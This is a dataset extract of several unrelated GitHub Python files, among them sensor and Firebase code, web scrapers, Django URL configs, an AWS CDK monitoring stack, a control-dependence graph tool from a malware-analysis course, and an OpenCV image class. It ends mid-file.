== 15): # exit the program after 10 readings. \r\n dhtDevice.exit()\r\n break;\r\n except RuntimeError as error:\r\n # Errors happen fairly often, DHT's are hard to read, just keep going\r\n print(error.args[0])\r\n time.sleep(2.0)\r\n continue\r\n except Exception as error:\r\n dhtDevice.exit()\r\n raise error\r\n GetDatafromFirebase(firebase.database()) # this statement is outside the while loop \r\n except (KeyboardInterrupt, SystemExit):\r\n print('Bye :)')\r\n\r\n finally:\r\n GPIO.cleanup()\r\n time.sleep(2.0)\r\n \r\nif __name__==\"__main__\":\r\n main()\r\n","repo_name":"SmartAirHumidifer/SmartAirHumidifier","sub_path":"SmartAirHumidifierSourceCode/combinedSensor.py","file_name":"combinedSensor.py","file_ext":"py","file_size_in_byte":8633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22960108669","text":"import requests\nimport pandas as pd\nfrom variables import Keywords\nfrom connection import SingletonMongoConnection as smc\nfrom bs4 import BeautifulSoup\n\n\ndef get_documents_without_authors(*, collection, registry) -> list[dict]:\n result = smc.get_db()[collection].find(\n {'registry': registry, 'authors': {'$exists': True}}, {'linkout': 1})\n list_cursor = list(result)\n return list_cursor\n\n\ndef find_authors_clinical_gov():\n collections = [Keywords.T_CLINICALTRIALS_OBS.value,\n Keywords.T_CLINICALTRIALS_RAND.value]\n for collection in collections:\n result = get_documents_without_authors(\n registry='ClinicalTrials.gov', collection=collection)\n for item in result:\n url = item['linkout']\n a = requests.get(url)\n soup = BeautifulSoup(a.text, 'html.parser')\n authors = []\n # je veux récupérer les auteurs de la page si le registery est clinicaltrials\n for contact in soup.find_all(attrs={\"headers\": \"contactName\"}):\n txt = contact.text.replace('Contact: ', '')\n authors.append(txt)\n for contact in soup.find_all(attrs={\"headers\": \"name\"}):\n authors.append(contact.text.replace('Contact: ', ''))\n smc.get_db()[collection].update_one(\n {'_id': item['_id']}, {'$set': {'authors': authors}})\n\n\ndef find_authors_chictr():\n collections = [Keywords.T_CLINICALTRIALS_OBS.value,\n Keywords.T_CLINICALTRIALS_RAND.value]\n for collection in collections:\n result = get_documents_without_authors(\n registry='CHICTR', collection=collection)\n for item in result:\n url = item['linkout']\n a = requests.get(url)\n soup = BeautifulSoup(a.text, 'html.parser')\n authors = []\n for contact in soup.find_all(\"p\"):\n if (contact.text == 'Study leader: '):\n txt = contact.next_sibling.next_sibling.text\n authors.append(txt)\n smc.get_db()[collection].update_one(\n {'_id': item['_id']}, {'$set': {'authors': authors}})\n\n\ndef init_scrap():\n find_authors_clinical_gov()\n find_authors_chictr()\n\n\nif __name__ == \"__main__\":\n init_scrap()\n","repo_name":"JulesLscx/covid_infograph","sub_path":"covid_infograph/files/get_authors.py","file_name":"get_authors.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"14607023739","text":"change = int(input('Change owed: '))\n\n\ndef coin_count(value):\n quarters = 0\n dimes = 0\n nickels = 0\n pennies = 0\n while value >1:\n quarters = value // 25\n value = value - (quarters*25)\n dimes = value//10\n value = value - (dimes*10)\n nickels = value//5\n value = value - (nickels*5)\n pennies = value\n value = 0\n\n total_coins = quarters+dimes+nickels+pennies\n return total_coins\n\n #print(f\"You return {total_coins} coins: {quarters} quarters, {dimes} dimes, {nickels} nickels, and {pennies} pennies.\")\n\nprint(f\"You give back {coin_count(change)} coins\")","repo_name":"CAW-Busteed/trials.pygame","sub_path":"PracticePython.Exercises/April2023/changecounter/change_counter.py","file_name":"change_counter.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71539579011","text":"# En el archivo urls.py de tu aplicación (miapp)\nfrom django.urls import path\nfrom .views import *\n\nurlpatterns = [\n # Configura la URL libros/ que mapea a la vista listar_libros\n path('libros/', listar_libros, name='listar_libros'),\n path('libros/crear/', crear_libro, name='crear_libro'),\n path('libros/modificar/<int:id>/', modificar_libro, name='modificar_libro'),\n path('libros/borrar/<int:id>/', borrar_libro, name='borrar_libro'),\n path('libros/buscar/', buscar_libros, name='buscar_libros'),\n path('navbar/', navbar, name='navbar')\n]","repo_name":"gerson222/clases-de-python-para-BAM2.0","sub_path":"bam2/ejemplolibros/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40757605998","text":"from django.urls import path ,include\nfrom rest_framework.routers import DefaultRouter\nfrom api.views import UserDetailViews,UserListViews, PharmacieDetailViews,PharmacieList, HospitalListViews,HospitalDetailViews,MedicamentListviews,MedicamentDetailviews,OrdonnanceListViews,OrdonnanceDetailViews\nfrom rest_framework import renderers\n\n# User_list = UserViews.as_view({\n# 'get': 'list'\n# })\n\n# User_datail= UserViews.as_view({\n# 'get':'retrieve',\n# 'put':'update',\n# 'delete':'destroy',\n# })\n\nrouter= DefaultRouter(trailing_slash=False)\nurlpatterns = [\n \n path('phamacie/', PharmacieList.as_view(),name=\"phamacies\"),\n path(\"phamacie/<int:pk>\",PharmacieDetailViews.as_view(),name=\"phamacies-detail\"),\n path('users/', UserListViews.as_view(),name=\"users\"),\n path('users/<int:pk>', UserDetailViews.as_view(),name=\"users-dedail\"),\n path('hospitol/', HospitalListViews.as_view(),name=\"users\"),\n path('hospitol/<int:pk>', HospitalDetailViews.as_view(),name=\"users-dedail\"),\n path('medicament/', MedicamentListviews.as_view(),name=\"users\"),\n path('medicament/<int:pk>', MedicamentDetailviews.as_view(),name=\"users-dedail\"),\n path('ordonnence/', OrdonnanceListViews.as_view(),name=\"users\"),\n path('ordonnence/<int:pk>', OrdonnanceDetailViews.as_view(),name=\"users-dedail\"),\n]\n","repo_name":"kevinvoli/e-sante","sub_path":"myApi/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22487720371","text":"#!/usr/bin/python3\nfrom add_0 import add\n\n\ndef test():\n a = 1\n b = 2\n print(\"{:d} + {:d} = {:d}\".format(a, b, add(a, b)))\n\n\n# execute only if file is not imported\nif __name__ == \"__main__\":\n test()\n","repo_name":"Arfs6/alx","sub_path":"alx-higher_level_programming/0x02-python-import_modules/0-add.py","file_name":"0-add.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"14882845701","text":"from tempest.api.compute import base\nfrom tempest import config\n\nCONF = config.CONF\n\n\nclass NetworksTest(base.BaseComputeAdminTest):\n _api_version = 2\n\n \"\"\"\n Tests Nova Networks API that usually requires admin privileges.\n API docs:\n http://developer.openstack.org/api-ref-compute-v2-ext.html#ext-os-networks\n \"\"\"\n\n @classmethod\n def resource_setup(cls):\n super(NetworksTest, cls).resource_setup()\n cls.client = cls.os_adm.networks_client\n\n def test_get_network(self):\n resp, networks = self.client.list_networks()\n configured_network = [x for x in networks if x['label'] ==\n CONF.compute.fixed_network_name]\n self.assertEqual(1, len(configured_network),\n \"{0} networks with label {1}\".format(\n len(configured_network),\n CONF.compute.fixed_network_name))\n configured_network = configured_network[0]\n _, network = self.client.get_network(configured_network['id'])\n self.assertEqual(configured_network['label'], network['label'])\n\n def test_list_all_networks(self):\n _, networks = self.client.list_networks()\n # Check the configured network is in the list\n configured_network = CONF.compute.fixed_network_name\n self.assertIn(configured_network, [x['label'] for x in networks])\n","repo_name":"codybum/OpenStackInAction","sub_path":"scripts/icehouse/opt/stack/tempest/tempest/api/compute/admin/test_networks.py","file_name":"test_networks.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"43"} +{"seq_id":"23323269340","text":"# -*- coding: utf-8 -*-\nimport models\nimport requests\nimport multiprocessing\n\nfrom helpers import random_str\nfrom config import sqla\nfrom gevent.pool import Pool\nfrom webs.douban import parsers\n\n\ndouban_celebrity_url = 'http://movie.douban.com/celebrity/'\ncookies = {\n 'bid': ''\n}\n\n\ndef create_requests_and_save_datas(douban_id):\n session = sqla['session']\n cookies['bid'] = random_str(11)\n\n r = requests.get(\n douban_celebrity_url + str(douban_id),\n cookies=cookies,\n timeout=5\n )\n\n if r.status_code != 200:\n return\n\n data = parsers.celebrity.start_parser(r.text)\n\n celebrity = session.query(models.Celebrity).filter_by(\n douban_id=douban_id\n ).one()\n\n for key in list(data.keys()):\n if type(data[key]) == list:\n data[key] = str(data[key])\n\n for k, v in data.items():\n setattr(celebrity, k, v)\n\n celebrity.is_detail = True\n session.commit()\n print(' '.join(\n ['celebrity', douban_id, data['name']]\n ))\n\n\ndef task(douban_ids, pool_number):\n pool = Pool(pool_number)\n\n for douban_id in douban_ids:\n pool.spawn(\n create_requests_and_save_datas,\n douban_id=douban_id,\n )\n\n pool.join()\n","repo_name":"billvsme/videoSpider","sub_path":"webs/douban/tasks/get_celebrities_full_data.py","file_name":"get_celebrities_full_data.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":217,"dataset":"github-code","pt":"43"} +{"seq_id":"19113085871","text":"import random\n\n\ndef naive_mul(x, y):\n if y == 0: return 0\n r = x\n for i in range(0, y - 1):\n x += r\n return x\n\n\nfor i in range(1000):\n x = int(random.random() * 100)\n y = int(random.random() * 100)\n assert x * y == naive_mul(x, y), f\"Ошибка: x({x}) * y({y}) = {x * y}, а в функции: {naive_mul(x, y)}\"\n\n# Неправильное выделение\n# Ненужный end\n# Ненужные точки с запятыми\n# Нет возвращаемого значения в функции\n# Складывать не с 1, а с самим собой\n# Ввести условие для умножения на 0\n","repo_name":"BigFrendyoff/VUZ","sub_path":"pr1/block3/task3_4.py","file_name":"task3_4.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37635583928","text":"import networkx as nx\n\npath = \"c_cout.dot\"\nouput_file = \"control_dep.dot\"\nmagic_exit = '0x40183d'\n#magic_exit = '0x40116e' # choose a arbitrary one,in this case it is where switch cases merge\n#'0x401fe1' works tpp\nbranch_set = set()\nins_dot_set = set()\n\ndef build_dot():\n f = open(\"c_output.txt\",'r')\n c_f= open(\"c_cout.dot\", 'w')\n c_f.write(\"digraph G {\\n\")\n\n lines = f.readlines()\n\n for i, ins in enumerate(lines[:-1]):\n if (lines[i], lines[i+1]) not in ins_dot_set:\n c_f.write(\"\\\"{0}\\\" -> \\\"{1}\\\"\\n\".format(str(lines[i][:-1]), str(lines[i+1][:-1])))\n ins_dot_set.add((lines[i], lines[i+1]))\n c_f.write(\"}\")\n\ndef get_branch_inst():\n f = open(\"branches.txt\", \"r\")\n branches = f.readlines()\n\n branches = [x[:-1] for x in branches[:-1]]\n return set(branches)\n\ndef get_ins_trace():\n f = open(\"c_output.txt\", \"r\")\n lines = f.readlines()\n lines = [x[:-1] for x in lines]\n return lines\n\ndef generate_control_dep():\n G = nx.nx_pydot.read_dot(path)\n reverse_G = G.reverse()\n\n IPD_dict = nx.immediate_dominators(reverse_G, magic_exit)\n CDS = list()\n instruction_trace = get_ins_trace()\n branch_set = get_branch_inst()\n\n o_file = open(ouput_file, 'w')\n o_file.write(\"digraph G {\\n\")\n edge_set = set()\n for i in instruction_trace:\n #i = ins[:-1]\n if len(CDS):\n if (i,CDS[-1][0]) not in edge_set:\n o_file.write(\"\\\"{0}\\\" -> \\\"{1}\\\"\\n\".format(i, CDS[-1][0]))\n edge_set.add((i,CDS[-1][0]))\n else:\n # depends on start\n if (i, \"start\") not in edge_set:\n o_file.write(\"\\\"{0}\\\" -> \\\"start\\\"\\n\".format(i))\n edge_set.add((i,\"start\"))\n\n if i in branch_set:\n CDS.append((i,IPD_dict[i]))\n\n while len(CDS) != 0 and CDS[-1][1] == i:\n del CDS[-1]\n\n o_file.write(\"}\")\n\ndef optimal_exit():\n instruction_trace = get_ins_trace()\n inst_trace = set(instruction_trace)\n num_ins = len(inst_trace)\n G = nx.nx_pydot.read_dot(path)\n reverse_G = G.reverse()\n\n ans_ins = ''\n min_diff = 100000\n for ins in inst_trace:\n IPD_dict = nx.immediate_dominators(reverse_G, ins)\n diff = num_ins - len(IPD_dict)\n\n if diff < min_diff:\n min_diff = diff\n ans_ins = ins\n\n print(f'min_diff {min_diff} ans_ins {ans_ins}')\n\ndef get_leaf_nodes():\n G = nx.nx_pydot.read_dot(path)\n\n for n in G.nodes():\n out = G.out_degree(n)\n if out == 0:\n print(n)\n#build_dot() # call once\n#optimal_exit() # call once\n# get_leaf_nodes() # no leaf nodes\ngenerate_control_dep()","repo_name":"move47/Advanced-Topics-in-Malware-Analysis","sub_path":"Lab #6/hw6.py","file_name":"hw6.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"41883639882","text":"import logging\nimport sys\n\nimport pandas as pd\nimport requests\n\n\ndef init_logger() -> logging.Logger:\n logger = logging.getLogger(\"free-proxy\")\n logger.setLevel(logging.DEBUG)\n\n stdout_handler = logging.StreamHandler(sys.stdout)\n stdout_handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n \"%(asctime)s - [%(levelname)s] - %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n )\n stdout_handler.setFormatter(formatter)\n\n logger.addHandler(stdout_handler)\n return logger\n\n\nclass BaseProxiesCrawler(object):\n logger = init_logger()\n\n def __init__(self) -> None:\n super().__init__()\n\n @staticmethod\n def empty_proxies(self) -> pd.DataFrame:\n return pd.DataFrame(columns=[\"ip address\", \"port\"])\n","repo_name":"Phimos/Comments-Mining-System-for-Scholar-Citations","sub_path":"citeminer/crawlers/freeproxy/base_proxy_crawler.py","file_name":"base_proxy_crawler.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"7149012196","text":"from aws_cdk import (\n core as cdk,\n aws_lambda as lambda_,\n aws_events as events_,\n aws_events_targets as targets_,\n aws_iam,\n aws_cloudwatch as cloudwatch_,\n aws_lambda_event_sources as sources_,\n aws_cloudwatch_actions as actions_,\n aws_sns as sns,\n aws_sns_subscriptions as subscriptions_,\n aws_codedeploy as codedeploy,\n aws_dynamodb as db,\n aws_apigateway as apigateway,\n aws_s3 as s3,\n aws_sqs as sqs,\n aws_s3_notifications as s3n\n)\n#import Construct as Construct\nfrom resources import constants as constants\nimport resources as resources\nfrom resources import s3b\nfrom resources import dyTabS3\nimport logging\n# from resources.controller import Controller\n# from resources.handler import Handler\n# from resources.repository import DynamoDBTaskRepository\nfrom resources.s3b import s3bukclass as buk\nfrom resources import constants as constants\nTable_NAME= \"waheeds3table\"\nfrom resources import tablelambda as read\n\nclass waheedsprint2(cdk.Stack):\n\n \n \n def __init__(self, scope: cdk.Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n\n\n# ---------------------------------------------- defining roles for web health------------------------#\n lambda_role= self.create_lambda_role()\n hw_lambda = self.create_lambda('lambda', './resources', 'webhealthmonitor.lambda_handler', lambda_role)\n lambda_schedule= events_.Schedule.rate(cdk.Duration.minutes(1))\n lambda_target=targets_.LambdaFunction(handler=hw_lambda)\n rule= events_.Rule(self, \"webHealth_invoke\", \n description= \"call lambda periodic\", \n enabled= True ,\n schedule= lambda_schedule,\n targets= [lambda_target]) #remember the braces, i spent so much time to figure out this error, cz this is treateda as array\n \n ## ------------------- create a table in dynamoDB to use and dblambda------------------- ##\n \n \n \n urltable=self.create_table(id='waheedurltable',\n key=db.Attribute(name=\"Links\",\n type=db.AttributeType.STRING))\n db_lambda_role = self.create_dbtable_lambda_role()\n s3_lambda = self.create_lambda(\"sprint3Lambda\", \"./resources\", \"s3lambda.lambda_handler\", db_lambda_role)\n \n db_lambda = self.create_lambda(\"DynamoDBLambda\", \"./resources\", 'dynamodb_lambda.lambda_handler', lambda_role)\n # s3_lambda = self.create_lambda('s3lambda',\"./resources/\",'dynamoSp3.lambda_handler',db_lambda_role)\n # s3_lambda.add_environment('table_name', urltable.table_name)\n \n #dynamo_table.grant_full_access(db_lambda)\n buckkk = s3b.s3bukclass(self, \"waheedbuc\")\n s3_lambda.add_event_source(sources_.S3EventSource(buckkk,\n events=[s3.EventType.OBJECT_CREATED],\n filters=[s3.NotificationKeyFilter(suffix=\".json\")]\n ))\n # urltable.grant_full_access(s3_lambda)\n # hw_lambda.add_environment('table_name', urltable.table_name)\n # s3_lambda.add_environment('table_name', urltable.table_name)\n \n # api_definition_s3_location = apigateway.ApiDefinitionS3Location(\n # bucket=\"waheedbuc\",\n # key=\"key\")\n # crud_lambda = self.create_lambda('crudlambda',\n # \"./resources1/\",\n # 'CRUD_api_lambda.lambda_handler',\n # db_lambda_role)\n # crud_lambda.add_environment(key = 'table_name', \n # value = constants.TABLENAME)\n # crud_lambda.grant_invoke( aws_iam.ServicePrincipal(\"apigateway.amazonaws.com\"))\n # urltable.grant_read_write_data(crud_lambda) \n \n # api = apigateway.LambdaRestApi(self, \"waheedapiiiigatewayy\",handler= crud_lambda)\n # items = api.root.add_resource(\"items\")\n # items.add_method(\"GET\") \n # items.add_method(\"PUT\") \n # items.add_method(\"DELETE\")\n \n \n # s3_lambda.add_environment(key = 'table_name', \n # value = )\n \n \n \n # hw_lambda.add_environment(key = 'table_name', \n # value = )\n \n \n #-----------------------------notifications subscriptions------------------------------------ #\n topic =sns.Topic(self, \"webhealthmonitortopic\")\n topic.add_subscription(subscriptions_.EmailSubscription('waheed.ahmad.s@skipq.org'))\n topic.add_subscription(subscriptions_.LambdaSubscription(fn=db_lambda))\n \n \n \n \n \n #------------------------alarms and matrices-----------------------------------------------#\n URlstomonitor = buk('waheeds3buk','urls.json').read_buk()\n linkx = read.gettable(Table_NAME)\n conss= 1\n for url in linkx:\n dimension={'URL' : url}\n \n availability_metric=cloudwatch_.Metric(namespace=constants.URL_MONITOR_NAMESPACE, \n metric_name= constants.URL_MONITOR_NAME_AVAILABILITY,\n dimensions_map=dimension,\n period=cdk.Duration.minutes(1),\n label= 'Availability Metric')\n availability_alarm= cloudwatch_.Alarm(self, \n \t\t\tid='AvailabilityAlarm'+'_'+constants.URL_TO_MONITOR,\n \t\t\tmetric= availability_metric , \n \t\t\tcomparison_operator= cloudwatch_.ComparisonOperator.LESS_THAN_THRESHOLD , \n \t\t\tdatapoints_to_alarm=1, \n \t\t\tevaluation_periods=1,\n \t\t \tthreshold=1) \n \n dimension={'URL':url}\n latency_metric=cloudwatch_.Metric(namespace=constants.URL_MONITOR_NAMESPACE, \n metric_name=constants.URL_MONITOR_NAME_LATENCY,\n dimensions_map=dimension,\n period=cdk.Duration.minutes(1),\n label= 'latency Metric' )\n latency_alarm= cloudwatch_.Alarm(self, \n \t\t\tid='LatencyAlarm'+'_'+constants.URL_TO_MONITOR,\n \t\t\tmetric= latency_metric , \n \t\t\tcomparison_operator= cloudwatch_.ComparisonOperator.GREATER_THAN_THRESHOLD , \n \t\t\tdatapoints_to_alarm=1, \n \t\t\tevaluation_periods=1,\n \t\t \tthreshold=0.25 )\n availability_alarm.add_alarm_action(actions_.SnsAction(topic))\n latency_alarm.add_alarm_action(actions_.SnsAction(topic))\n conss+=1\n \n ##########link the alarm to subscription\n \n# duration_metric=cloudwatch_.Metric(namespace = 'AWS/Lambda', \n# metric_name = 'Duration',\n# dimensions_map = {'FunctionName' :hw_lambda.function_name})\n# failure_alarm= cloudwatch_.Alarm(self, \n# \t\t\tid='pipelinealarm',\n# \t\t\tmetric= duration_metric , \n# \t\t\tcomparison_operator= cloudwatch_.ComparisonOperator.GREATER_THAN_THRESHOLD, \n# \t\t\tevaluation_periods=1,\n# \t\t \tthreshold=350) \n# versions = hw_lambda.add_version(\"nnversion\")\n# myalias = lambda_.Alias(self, \"LambdaAlias\",\n# alias_name=\"waheedpipelinealias\",\n# version= hw_lambda.current_version)\n\n# codedeploy.LambdaDeploymentGroup(self, \"webhealthmonitor\",\n# alias= myalias,\n# alarms = [failure_alarm])\n \n \n# # codedeploy.LambdaDeploymentConfig(self, \n# # \"code\" ,\n# # alias,\n# # LINEAR_10_PERCENT_EVERY_5_MINUTE,\n# # alarms=[failure_alarm])\n# failure_alarm.add_alarm_action(actions_.SnsAction(topic))\n \n def create_lambda_role(self):\n lambdaRole = aws_iam.Role(self, \"lambda-role-db\",\n assumed_by = aws_iam.ServicePrincipal('lambda.amazonaws.com'),\n managed_policies=[\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('service-role/AWSLambdaBasicExecutionRole'),\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('AmazonDynamoDBFullAccess'),\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('AmazonSNSFullAccess'),\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('AmazonS3FullAccess')\n ])\n return lambdaRole\n def create_dbtable_lambda_role(self):\n lambdaRole = aws_iam.Role(self, \"lambda-role-db2\",\n assumed_by = aws_iam.ServicePrincipal('lambda.amazonaws.com'),\n managed_policies=[\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('service-role/AWSLambdaBasicExecutionRole'),\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('AmazonDynamoDBFullAccess'),\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('AmazonSNSFullAccess'),\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('AmazonS3FullAccess')\n ])\n return lambdaRole\n \n # def create_alais(self,id,name,version):\n # return lambda_.Alias(self , id , alias_name = name,\n # version = version)\n \n def create_lambda(self, id, asset,handler, role):\n return lambda_.Function(self, id,\n runtime=lambda_.Runtime.PYTHON_3_6 ,\n handler=handler,\n code=lambda_.Code.from_asset(asset),\n role=role\n)\n ### create table ###\n \n def create_table(self,id,key):\n return db.Table(self,id,\n partition_key=key)\n \n \n \n","repo_name":"waheed2021skipq/ProximaCentauri","sub_path":"waheed_ahmad/sprint3/sprint3/sprint3_stack.py","file_name":"sprint3_stack.py","file_ext":"py","file_size_in_byte":10273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"8077581447","text":"import cv2\nimport numpy as np\nimport glob as gb\nimport copy as cp\nimport book_parms as bpar\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom time import sleep\n#\n# Useful classes \n#\nimport newfcns as nf\n\n \ndef RC2PXY(rcTuple): ## OpenCV's confusing Point coords.\n return (rcTuple[1],rcTuple[0])\n\nclass bookImage():\n def __init__(self,img, mmPpx):\n self.scale = mmPpx # mm per pixel (or 1 pixel in mm)\n self.image = img\n \n # set up the size/shape parameters\n sh = self.image.shape\n self.rows = sh[0]\n self.cols = sh[1]\n if len(sh) > 2:\n self.type = 'color'\n else:\n self.type = 'mono'\n self.width_mm = self.cols*self.scale\n self.height_mm = self.rows*self.scale\n self.ctXmm = self.width_mm/2.0 # mm offset to center of image H\n self.ctYmm = self.height_mm/2.0 # mm offset to center of image V\n \n # validate image type here\n \n def isequal(self,x):\n if self.type != 'mono':\n print('illegal image type for isequal()')\n quit()\n mask = int(np.zeros((self.rows,self.cols)))\n for r in range(self.rows):\n for c in range(self.cols):\n if self.image[r,c] == x:\n mask[r,c] = 1\n return mask\n \n def icopy(self):\n return cp.deepcopy(self,{})\n \n def blank(self):\n x = np.ndarray([self.rows, self.cols,3])\n return x\n \n def write(self):\n name = input('Enter an image file name: (w/o .png)')\n name += '.png'\n cv2.imwrite(name, self.image)\n \n def ishape(self): \n sh = self.image.shape\n \n #print(' Image scale info:')\n #print(' Scale Factor: ', self.scale, ' mm/pixel')\n #print(' rows/cols: ', sh)\n #print(' height/width(mm)', self.height_mm, self.width_mm )\n \n return sh\n \n def get_px_RC(self,row,col):\n return(self.image[row][col])\n \n def set_px_RC(self, row,col,value):\n if self.type == 'mono':\n l1 =1\n elif self.type == 'color':\n l1 = 3\n else:\n print('set_px_RC: image type')\n quit()\n if type(value) == type(5):\n l2 = 1\n if type(value) == type((0,0,0)):\n l2 = 3\n assert l1 == l2, 'attempting to set wrong pixel size (RGB vs mono)'\n self.image[row][col] = value\n return\n \n def get_px_XYmm(self,Xmm,Ymm):\n row,col = self.XYmm2RC(Xmm,Ymm)\n return self.image[row,col]\n \n def XYmm2RC(self,Xmm,Ymm): \n row = int(self.rows/2 - Ymm/self.scale + 0.5)\n col = int(self.cols/2 + Xmm/self.scale + 0.5)\n return (row, col)\n \n def RC2XYmm(self,row,col):\n Xmm = col*self.scale - self.ctXmm - 0.5\n Ymm = -1*row*self.scale + self.ctYmm - 0.5\n return (Xmm, Ymm)\n \n # create a new bookImage scaled down by factor\n def downvert(self, factor):\n print('downvert: scaling down by factor: ',factor)\n tmp = self.icopy() \n tmp.scale = self.scale * factor # mm_per_pixel\n sh = self.image.shape\n img_width = int(sh[1] / factor)\n img_height = int(sh[0] / factor)\n tmp.rows = img_height\n tmp.cols = img_width\n tmp.image = cv2.resize(tmp.image, (img_width,img_height))\n # set up the size/shape parameters\n tmp.width_mm = tmp.cols*tmp.scale\n tmp.height_mm = tmp.rows*tmp.scale\n tmp.ctXmm = tmp.width_mm/2.0 # mm offset to center of image H\n tmp.ctYmm = tmp.height_mm/2.0 # mm offset to center of image V\n \n return tmp \n\n def blur_mm_rad(radius):\n b = int(radius/self.scale)\n if b%2 == 0: # radius must be odd # \n b+=1 \n tmp = cv2.GaussianBlur(self.image, (b,b), 0)\n self.image = tmp\n return \n \n def Get_mmBounds(self):\n xmin = -self.width_mm/2\n ymin = -self.height_mm/2\n xmax = self.width_mm/2\n ymax = self.height_mm/2\n return (xmin, xmax, ymin, ymax)\n \n def Dline_ld(self,ld,color,width=3): # draw line based on line dict params\n p1 = (ld['xmin'], ld['m0']*ld['xmin'] + ld['b0'] + ld['ybias'])\n p2 = (ld['xmax'], ld['m0']*ld['xmax'] + ld['b0'] + ld['ybias'])\n self.Dline_mm(p1,p2,color,width)\n \n # Draw a line/rect in mm coordinates\n #\n # p1 = (p1X, p1Y) etc\n # NOTE: drawing uses \"Points()\" not [row,col]!!!!!\n def Dline_mm(self, p1xy, p2xy, st_color, width=3):\n p1_px = self.XYmm2RC( p1xy[0], p1xy[1]) # Xmm, Ymm\n p2_px = self.XYmm2RC( p2xy[0], p2xy[1])\n #print('Dline_mm: Drawing line from {:} to {:} (row,col)'.format(p1_px,p2_px))\n cv2.line(self.image, RC2PXY(p1_px), RC2PXY(p2_px), bpar.colors[st_color], width)\n \n \n \n def Drect_mm(self, p1, p2, st_color, width=3):\n p1_px = self.XYmm2RC(p1[0], p1[1])\n p2_px = self.XYmm2RC(p2[0], p2[1])\n cv2.rectangle(self.image, RC2PXY(p1_px), RC2PXY(p2_px), bpar.colors[st_color], width)\n \n # draw a square to mark a spot centered on p1\n def Dmark_mm(self, p1mm, side, color):\n #side = square side length in mm \n # get corners of square\n ps1 = ( p1mm[0] - side/2, p1mm[1] - side/2 ) \n ps2 = ( p1mm[0] + side/2, p1mm[1] + side/2 )\n self.Drect_mm(ps1,ps2,color)\n \n # draw a square to mark a spot centered on p1\n def Dmark_px(self, p1RC, side, color):\n #side = square side length in pixels \n # get corners of square\n ps1 = ( int(p1RC[0] - side/2), int(p1RC[1] - side/2) ) \n ps2 = ( int(p1RC[0] + side/2), int(p1RC[1] + side/2) )\n self.Drect_px(ps1,ps2,color)\n \n def Dline_px(self, p1, p2, st_color, width=3):\n p1r = (p1[1],p1[0])\n p2r = (p2[1],p2[0])\n cv2.line(self.image, p1r, p2r, bpar.colors[st_color], width)\n\n \n def Drect_px(self, p1, p2, st_color, width=3):\n p1r = RC2PXY(p1)\n p2r = RC2PXY(p2)\n cv2.rectangle(self.image, p1r, p2r, bpar.colors[st_color], width)\n \n def Dxy_axes(self):\n # Draw H and V axes (X,Y axes in mm) \n (xmin, xmax, ymin, ymax) = self.Get_mmBounds()\n\n self.Dline_mm((xmin,0), (xmax,0),'white')\n self.Dline_mm((0, ymin), (0, ymax), 'white')\n\n ## Draw some tick marks\n tick_locs_mm = [] # pix\n tickwidth = 20 # mm\n for xt in range(int(xmax/tickwidth)): # unitless\n xpt = tickwidth*(xt+1) # mm\n tick_locs_mm.append(xpt)\n tick_locs_mm.append(-xpt)\n ya = 0.0 #mm\n yb = -5.0 #mm\n for x in tick_locs_mm:\n self.Dline_mm((x, ya), (x,yb), 'green') # draw the tick marks\n \ndef approx(a,b):\n if abs(a-b) < 0.0001:\n return True\n else:\n return False\n \ndef printpass(str):\n print('\\n {:40} PASS\\n'.format(str))\n \n \nif __name__=='__main__':\n \n print('\\n\\n Testing bookImage class \\n\\n')\n \n img_paths = gb.glob('tiny/testimage2.png')\n d2r = 2*np.pi/360.0 #deg to rad\n\n if (len(img_paths) < 1):\n print('No files found')\n quit()\n for pic_filename in img_paths:\n print('looking at '+pic_filename)\n #img_gray, img = pre_process(pic_filename)\n #cv2.IMREAD_GRAYSCALE\n \n #\n # read in the image\n #\n #img = cv2.imread(pic_filename, cv2.IMREAD_COLOR)\n img_orig = cv2.imread(pic_filename, cv2.IMREAD_COLOR)\n tsti = img_orig.copy() # copy of original for visualization \n\n sh = img_orig.shape\n print('Original: {:} rows, {:} cols.'.format(sh[0],sh[1]))\n \n #Instantiate\n pixels_per_mm = 5.0\n mm_per_pixel = 1.0/pixels_per_mm\n tim1 = bookImage(img_orig, mm_per_pixel) # mm/pixel\n \n sh2 = tim1.ishape()\n assert sh == sh2, 'shape method FAILS'\n \n printpass('ishape() tests')\n \n ## # converting tests\n \n ## TEST mm to row,col on 4 